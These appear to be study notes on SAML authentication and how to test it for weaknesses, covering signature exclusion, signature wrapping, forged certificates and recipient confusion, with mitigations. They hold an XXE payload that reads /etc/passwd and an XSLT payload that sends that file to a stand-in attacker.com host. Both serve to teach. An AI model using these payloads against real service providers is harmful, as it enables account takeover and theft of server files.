8c. SAML

While I was working on this, I came across an amazing article, which has extensive research on the topic!

I borrowed some of his content and simplified it so I could understand it better.
Resources:
https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/

1. Introduction to SAML

What is SAML?

Secure Assertion Markup Language (SAML) is an XML-based authentication and authorization protocol used primarily for Single Sign-On (SSO). It enables secure identity federation, allowing users to authenticate once and access multiple services.

Why Use SAML?

✅ Eliminates the need for repeated logins.
✅ Enables secure SSO across different platforms.
✅ Uses digitally signed XML assertions for authentication and authorization.


2. SAML Components

Component Description
Identity Provider (IdP) Authenticates users and issues SAML assertions.
Service Provider (SP) Relies on SAML assertions from the IdP to grant access.
SAML Assertion XML document containing authentication and authorization data.

3. SAML Authentication Flow

sequenceDiagram
    participant User
    participant SP as Service Provider (SP)
    participant IdP as Identity Provider (IdP)

    User->>SP: Requests access
    SP->>IdP: Redirects user with SAML Request
    User->>IdP: Logs in
    IdP->>User: Sends back signed SAML Assertion
    User->>SP: Submits assertion
    SP->>User: Grants access

Step-by-Step Example

  1. User requests access to academy.htb (SP).
  2. SP redirects user to sso.htb (IdP) with a SAML request.
  3. User logs in at sso.htb.
  4. IdP generates & signs a SAML assertion containing user details.
  5. User submits assertion to SP.
  6. SP verifies the assertion and grants access.

4. SAML Assertion Example

<saml:Assertion ID="_1234567890" IssueInstant="2024-03-18T12:00:00Z" Version="2.0">
    <saml:Issuer>http://sso.htb/idp/</saml:Issuer>
    <saml:Subject>
        <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">john@htb.com</saml:NameID>
    </saml:Subject>
    <saml:AttributeStatement>
        <saml:Attribute Name="username">
            <saml:AttributeValue>john</saml:AttributeValue>
        </saml:Attribute>
        <saml:Attribute Name="role">
            <saml:AttributeValue>admin</saml:AttributeValue>
        </saml:Attribute>
    </saml:AttributeStatement>
</saml:Assertion>

Important Fields:


4.1. XML Signature Validation

4.1.1 What Is XML Signature?

XML Signature (XMLDSig) is a standard for digitally signing XML data. It ensures:


4.1.2 Structure of an XML Signature

<ds:Signature>
  <ds:SignedInfo>
    <ds:CanonicalizationMethod/>
    <ds:SignatureMethod/>
    <ds:Reference URI="#target-id">
      <ds:Transforms/>
      <ds:DigestMethod/>
      <ds:DigestValue>...</ds:DigestValue>
    </ds:Reference>
  </ds:SignedInfo>
  <ds:SignatureValue>...</ds:SignatureValue>
  <ds:KeyInfo>...</ds:KeyInfo>
</ds:Signature>

Key Elements

Element Description
SignedInfo What is signed and how.
Reference Which part of the XML is signed (by ID).
DigestValue The hash of the referenced XML content.
SignatureValue The digital signature over the SignedInfo.
KeyInfo Information about the key used (e.g., public key).

4.1.3 Signature Validation Flow

graph TD
    A[Start Signature Validation] --> B[Locate - ds:Signature block]
    B --> C[Extract  - ds:Reference URI]
    C --> D[Find target element by URI]
    D --> E[Apply Transforms + Canonicalization]
    E --> F[Compute DigestValue - hash]
    F --> G[Compare with embedded DigestValue]
    G --> H{Match?}
    H -- Yes --> I[Use KeyInfo to get public key]
    I --> J[Verify SignatureValue using public key]
    J --> K{Valid?}
    K -- Yes --> L[Trust XML data]
    K -- No --> M[Reject XML - Invalid Signature]
    H -- No --> M

Canonicalization is the process of converting XML into a standardized format so that insignificant differences (like whitespace, attribute order, or quote styles) do not affect signature validation.


4.1.4 Example in SAML

<ds:Reference URI="#_assertion123">...</ds:Reference>

<saml:Assertion ID="_assertion123">...</saml:Assertion>

5. SAML Attacks & Exploits

5.1 Signature Exclusion Attack

Overview

Steps to Exploit

  1. Obtain a valid SAML Response (capture via Burp Suite).
  2. Modify user attributes (e.g., change role=user to role=admin).
  3. Remove the <ds:Signature> element.
  4. Encode & submit the manipulated SAML Response.

Exploitation Flow

graph TD
    A[Capture SAML Response] --> B[Modify User Role]
    B --> C[Remove Signature Block]
    C --> D[Re-encode & Send]
    D --> E[SP Grants Unauthorized Access]

Mitigation:


5.2 XML Signature Wrapping Attack - XSW

Overview

Signature Wrapping is a type of attack against SAML-based systems. It takes advantage of a gap between two parts of how the system works:

  1. Signature verification logic – checks if the SAML message was signed and hasn’t been tampered with.

  2. Authentication data processing – decides which user info to trust and use.

In this attack, the hacker adds extra XML tags to the SAML message. These new tags don’t break the digital signature, so the system thinks everything is okay. But because of how the system reads the XML, it might end up trusting the attacker’s fake (unsigned) user info instead of the real (signed) one — which can let the attacker log in as someone else.

Scenario Signed? Vulnerability
Signature in Response referencing Response ID ✅ Fully signed ✅ Lower XSW risk
Signature in Assertion referencing Assertion ID ✅ Only Assertion is signed ⚠️ Higher XSW risk if the parser isn't strict
Reference URI does not match used element ❌ Not properly signed ❌ High risk – Signature Wrapping likely exploitable

Example 1: Signature on the Response (Safe)

<samlp:Response ID="_res123">
  <ds:Signature>
    <ds:Reference URI="#_res123"/>
  </ds:Signature>
  ...
</samlp:Response>

Example 2: Signature on the Assertion (Common but Risky)

<samlp:Response ID="_res456">
  <saml:Assertion ID="_assert789">
    <ds:Signature>
      <ds:Reference URI="#_assert789"/>
    </ds:Signature>
    ...
  </saml:Assertion>
</samlp:Response>

Example 3: Signature references a different ID than what the app uses

<ds:Reference URI="#legit123"/>
...
<saml:Assertion ID="malicious456">...</saml:Assertion>

Steps to Exploit

  1. Capture SAML Response.
  2. Inject an unsigned assertion before the signed one.
  3. Modify the username & role inside the new assertion.
  4. Submit manipulated SAML Response.

Exploitation Flow

graph TD
    A[Valid Signed Assertion] --> B[Inject Unsigned Assertion]
    B --> C[Modify User Details]
    C --> D[Submit to SP]
    D --> E[SP Processes Unsigned Assertion First]

Mitigation:


5.3 XXE (XML External Entity) Injection

Overview

Payload

<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<samlp:Response>
  <saml:AttributeStatement>
    <saml:Attribute Name="role">
      <saml:AttributeValue>&xxe;</saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>
</samlp:Response>

Mitigation:


5.4 Extensible Stylesheet Language Transformation (XSLT) via SAML

Extensible Stylesheet Language Transformation (XSLT) is a language used to turn XML documents into other formats like HTML, JSON, or PDF.

In this attack, XSLT is abused inside a SAML Response to try to read files or send data to an attacker — even without a valid signature.

The XSLT Transform runs before the signature is checked, so even if the signature is fake or self-signed, the attack can still happen.


How the Attack Works

  1. Intercept a valid SAML Response (doesn’t have to be signed by a trusted authority).

  2. Replace or inject your XSLT payload into the <ds:Transform> part.

  3. Use a Burp Collaborator URL to catch the outbound call and confirm exploitation.


Example Payload

<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  ...
  <ds:Transforms>
    <ds:Transform>
      <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="doc">
          <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
          <xsl:variable name="escaped" select="encode-for-uri($file)"/>
          <xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
          <xsl:variable name="exploitUrl" select="concat($attackerUrl, $escaped)"/>
          <xsl:value-of select="unparsed-text($exploitUrl)"/>
        </xsl:template>
      </xsl:stylesheet>
    </ds:Transform>
  </ds:Transforms>
  ...
</ds:Signature>

5.5 Open Redirects & Token Hijacking

Overview

Steps to Exploit

  1. Craft a malicious redirect_uri pointing to the attacker’s server.
  2. Send phishing link to the victim.
  3. Victim logs in → Token gets sent to the attacker.

Mitigation:


5.6 Certificate Faking via SAML

5.6.1 Key Concept

Insecure SAML implementations may accept self-signed certificates. By creating and injecting a fake cert, you can modify the contents of a SAML Assertion and re-sign it in a way the application will still trust.

5.6.2 Steps to Fake a Certificate in Burp Suite using SAML Raider

### 🛑 Step 1: Intercept the SAML Response
- Use **Burp Proxy** to capture a SAML Response.
- Confirm the response contains a `<ds:Signature>` block.

---

### 🧾 Step 2: Send the Certificate to SAML Raider
- In SAML Raider, click `Send Certificate to SAML Raider Certs`.

---

### 💡 Step 3: Create a Self-Signed Cert
- Go to the **Certificates** tab.
- Highlight the imported cert.
- Click `Save and Self-Sign` to create a self-signed clone.

---

### 🧪 Step 4: Modify and Re-sign the SAML Response
- Go back to the intercepted request in Burp Proxy.
- Select your **self-signed cert** from the `XML Signature` dropdown.
- Click `Remove Signatures` to strip the original one.
- Click `(Re-)Sign Message` or `(Re-)Sign Assertion`.

---

### 🚀 Step 5: Forward the Modified Response
- Forward the updated SAML Response.
- If accepted, the Service Provider trusts your forged cert.

5.6.4 Mermaid Diagram

flowchart TD
  A[Intercept SAML Response] --> B[Send Certificate to SAML Raider]
  B --> C[Create Self-Signed Certificate]
  C --> D[Modify XML Signature]
  D --> E[Remove Original Signature]
  E --> F[Re-sign with Self-Signed Cert]
  F --> G[Forward the Request]
  G --> H{SP Accepts It?}
  H -- Yes --> I[Modify Assertion Values 'User, Role, etc']
  H -- No --> J[Try Other Attack Vector]

5.7 Token Recipient Confusion (SAML-TRC)

5.7.1 Key Concept

Token Recipient Confusion occurs when a Service Provider (SP) fails to properly validate the Recipient attribute inside a SAML Response.

✅ If SP-Target accepts a SAML assertion meant for SP-Legit, that’s a Recipient Confusion vulnerability.


5.7.2 Prerequisites


5.7.3 Attack Steps

1. Authenticate normally to **SP-Legit** using the shared **IdP**.
2. **Intercept** the SAML Response from IdP → SP-Legit (using Burp, etc).
3. **Forward** the intercepted SAML Response to **SP-Target** instead.
4. If **SP-Target** doesn’t check the `Recipient` field correctly, it will accept the assertion.

5.7.4 Outcome

If the attack is successful:


5.7.5 Mermaid Diagram

sequenceDiagram
  participant User
  participant IdP
  participant SP-Legit
  participant SP-Target

  User->>IdP: Authenticate via shared IdP
  IdP-->>User: SAML Response (Recipient = SP-Legit)
  User->>SP-Target: Send same SAML Response
  alt SP-Target checks Recipient
    SP-Target-->>User: Rejects Assertion
  else SP-Target skips Recipient validation
    SP-Target-->>User: Grants Access (vulnerable)
  end

6. SAML Security Best Practices

Security Control Implementation
Enforce Signature Validation Reject unsigned assertions.
Restrict Redirect URIs Use exact whitelisting.
Disable XML External Entities (XXE) Harden XML parsers.
Validate Assertion Expiry Reject expired SAML assertions.
Use Secure SAML Libraries Avoid custom SAML implementations.

7. Tools for SAML Testing

Tool Description
SAML Raider Burp Suite extension for SAML attacks.
SAML Decoder Decodes SAML responses for analysis.
SAML Tracer Firefox extension for capturing SAML requests.

8. Summary Table

Attack Type Description Mitigation
Signature Exclusion Remove signature to bypass verification. Enforce signature validation.
Signature Wrapping Inject an unsigned assertion before the signed one. Only process signed assertions.
XXE Injection Extract local files via XML entities. Disable external entity processing.
Open Redirect Redirect tokens to attacker-controlled URLs. Use strict redirect_uri whitelisting.